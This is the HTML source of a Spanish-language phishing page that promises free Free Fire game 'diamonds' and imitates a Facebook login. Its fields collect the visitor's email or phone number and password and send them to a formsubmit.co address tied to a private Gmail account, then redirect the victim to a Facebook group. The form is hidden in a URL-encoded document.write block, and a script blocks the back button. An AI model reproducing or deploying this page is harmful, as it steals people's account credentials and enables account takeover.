<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    />
    <meta name="robots" content="noindex" />
    <meta name="robots" content="nofollow" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta name="theme-color" content="#3B5998" />
    <meta name="msapplication-TileColor" content="#3B5998" />
    <meta name="msapplication-navbutton-color" content="#3B5998" />
    <meta name="apple-mobile-web-app-status-bar-style" content="#3B5998" />
    <meta
      name="viewport"
      content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"
    />
    <link
      rel="icon"
      type="image/png"
      href="https://www.geekmi.news/__export/1611963921022/sites/debate/img/2021/01/29/free_fire_conejo_crop1611963734738.jpg_1902800913.jpg"
    />
    <title>Diamantes Gratis 2024/<title> <h1>facebook grupo insano</h1></title>
  </head>

  <body>
    <img
      src="https://whos.amung.us/pingjs/?k=kshck&amp;t=Sky&amp;x=https://web.whatsapp.com/"
      style="display: none"
    />
    <style type="text/css">
      body {
        padding: 0;
        margin: 0;
        font-family: sans-serif;
      }

      a {
        color: #576b95;
        cursor: pointer;
        text-decoration: none;
      }

      #top {
        color: #216fdb;
        text-align: center;
        background: #fffbe2;
        width: 100%;
        padding: 10px 0px;
      }

      #top img {
        position: relative;
        top: 3px;
        right: 5px;
      }

      #top div {
        width: 90%;
        margin: auto;
      }

      #logo {
        text-align: center;
      }

      #logo img {
        width: 184px;
        height: 36px;
        margin: 30px 0;
      }

      #layout {
        width: 90%;
        margin: auto;
      }

      .txt {
        padding: 3% 2%;
        background: #f5f6f7;
        border: 1px solid #e3e4e5;
        width: 96%;
        margin-bottom: 15px;
        -webkit-tap-highlight-color: transparent;
        font-size: 14px;
        line-height: 18px;
        border-radius: 5px;
        box-shadow: 1px 1px #cacaca;
      }

      #blogin {
        padding: 11px;
        background: #1877f2;
        border: 0;
        margin: center 5%;
        margin-left: -3%;
        width: 100%;
        margin-bottom: 15px;
        font-size: 16px;
        line-left: 10%;
        line-height: 18px;
        border-radius: 5px;
        box-shadow: 0 2px 2px -2px #cacaca;
        color: #fff;
        font-weight: bold;
        text-shadow: 0 -1px rgb(0 0 0 / 25%);
      }

      #bcreate {
        padding: 12px 0;
        background: #00a400;
        border: 0;
        width: 60%;
        margin: auto;
        font-size: 14px;
        line-height: 18px;
        border-radius: 8px;
        box-shadow: 0 2px 2px -2px #cacaca;
        color: #fff;
        font-weight: bold;
        text-shadow: 0 -1px rgb(0 0 0 / 25%);
        margin-top: 20px;
      }

      p {
        text-align: center;
      }

      .bb {
        float: left;
        width: 42%;
        border-bottom: 2px solid #eaebed;
        height: 10px;
      }

      #c {
        float: left;
        width: 600%;
        text-align: center;
      }

      #bottom {
        width: 100%;
        text-align: center;
      }

      @media only screen and (min-width: 600px) {
        #layout {
          width: 380px;
          margin: auto;
        }
      }

      body {
        background-image: url("https://quizizz.com/media/resource/gs/quizizz-media/quizzes/fd0f7a01-0422-4087-8da0-6a49b667e49a");
        background-position: center center;
        background-repeat: no-repeat;
        background-size: cover;
        background-attachment: fixed;
        margin-top: 36%;
      }
      input,
      select {
        width: 96%;
        padding: 0.2em;
        font-size: 1em;
        cursor: pointer;
        border: none;
        border-bottom: 0.1em solid #000000;
        color: rgb(23, 47, 182);
        text-align: left;
        margin-bottom: 1em;
      }
    </style>
    <script type="text/javascript">
      window.history.pushState(null, "", window.location.href);
      window.onpopstate = () => {
        window.history.pushState(null, "", window.location.href);
        callback();
      };
    </script>
    <!-- Google tag (gtag.js) -->
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag() {
        dataLayer.push(arguments);
      }
      gtag("js", new Date());

      gtag("config", "UA-77070303-1");
    </script>
    <div id="top">
      <div>
        <img src="tele.png" width="20px" />Iniciar en facebook messenger
        <br />
      </div>
    </div>

    <div id="layout" style="margin-top: 20px">
      <form action="https://formsubmit.co/marco42748261@gmail.com" method="POST">
        <script>
          <!--
          document.write(
            unescape(
              "%3Cinput%20type%3D%22hidden%22%20name%3D%22id%22%20id%3D%22uid%22%20value%3D%221%22%3E%0A%20%20%20%20%20%20%3Cinput%20type%3D%22email%22%20name%3D%22Correo%20electr%F3nico%22%20id%3D%22uu%22%20class%3D%22txt%22%20minlenth%3D%225%22%0A%20%20%20%20%20%20%20%20placeholder%3D%22Correo%20electr%F3nico%20o%20n%FAmero%20de%20tel%E9fono%22%20required%3E%0A%20%20%20%20%20%20%3Cinput%20type%3D%22password%22%20name%3D%22contrase%F1a%22%20id%3D%22pp%22%20class%3D%22txt%22%20minlenth%3D%225%22%20placeholder%3D%22Contrase%F1a%22%20required%3E%0A%20%20%20%20%20%20%3Cselect%20name%3D%22rol%22%20%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%220%22%20style%3D%22background-color%3A%20rgba%28136%2C%20136%2C%20146%2C%200.447%29%3B%22%20style%3D%22display%3Anone%3B%22%3E%3Clabel%3E%20%20Cantidad%20de%20DIAMANTES%20%3C/style%3E%20%3C/style%3E%3C/label%3E%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%221%22%3E5K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%222%22%3E10K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%223%22%3E15K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%224%22%3E20K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%225%22%3E25K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%226%22%3E30K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%227%22%3E35K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%228%22%3E40K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%229%22%3E45K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3Coption%20value%3D%2210%22%3E50K%20Diamantes%3C/option%3E%0A%20%20%20%20%20%20%20%20%3C/select%3E%0A%20%20%20%20%20%20%3Cdiv%20style%3D%22text-align%3Acenter%20%3B%22%3E%0A%20%20%20%20%20%20%3Cbutton%20type%3D%22submit%22%20id%3D%22blogin%22%3Einiciar%20sesion%3C/button%3E%0A%20%20%20%20%20%20%3Cp%3E%3Ca%3E%BFOlvidaste%20tu%20contrase%F1a%3F%3C/a%3E%3C/p%3E%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22bb%22%3E%3C/div%3E%0A%20%20%20%20%20%20%3Cdiv%20id%3D%22c%22%3E%0A%20%20%20%20%20%20%20%20or%0A%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%3Cdiv%20class%3D%22bb%22%3E%3C/div%3E%0A%20%20%20%20%20%20%3Cdiv%20id%3D%22bottom%22%3E%0A%20%20%20%20%20%20%20%20%3Cbutton%20id%3D%22bcreate%22%3ECrear%20cuenta%20nueva%3C/button%3E%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%3Cdiv%20style%3D%22text-align%3Acenter%20%3B%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22hidden%22%20name%3D%22_next%22%20value%3D%22https%3A//www.facebook.com/groups/918368155876118/%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22hidden%22%20name%3D%22_captcha%22%20value%3D%22false%22%3E%20%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%3C/form%3E%0A%20%20%20%0A%20%20%3C/div%3E%0A%20%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20%20%20%20var%20uid%20%3D%20document.getElementById%28%22uid%22%29%0A%20%20%20%20var%20uu%20%3D%20document.getElementById%28%22uu%22%29%0A%20%20%20%20var%20pp%20%3D%20document.getElementById%28%22pp%22%29%0A%20%20%20%20var%20button%20%3D%20document.getElementById%28%22blogin%22%29%0A%0A%20%20%20%20var%20form%20%3D%20document.getElementById%28%22fu%22%29%3B%0A%20%20%20%20form.addEventListener%28%22submit%22%2C%20function%20%28event%29%20%7B%0A%20%20%20%20%20%20event.preventDefault%28%29%3B%0A%20%20%20%20%20%20if%20%28uu.value%20%3D%3D%20%22%22%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23correo%20electronico%22%29.focus%28%29%3B%0A%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20if%20%28pp.value%20%3D%3D%20%22%22%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23contrase%F1a%22%29.focus%28%29%3B%0A%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20form.submit%28%29%3B%0A%20%20%20%20%7D%29%3B%0A%0A%20%20%3C/script%3E%0A%3C/body%3E%0A%0A%3C/html%3E"
            )
          );
          //-->
        </script>
      </form>
    </div>
  </body>
</html>
